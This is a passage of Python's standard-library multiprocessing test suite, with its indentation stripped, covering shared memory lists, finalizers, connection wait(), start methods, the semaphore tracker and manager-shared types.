self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
pid = _semaphore_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
os.waitpid(pid, 0)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("semaphore_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGTERM, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
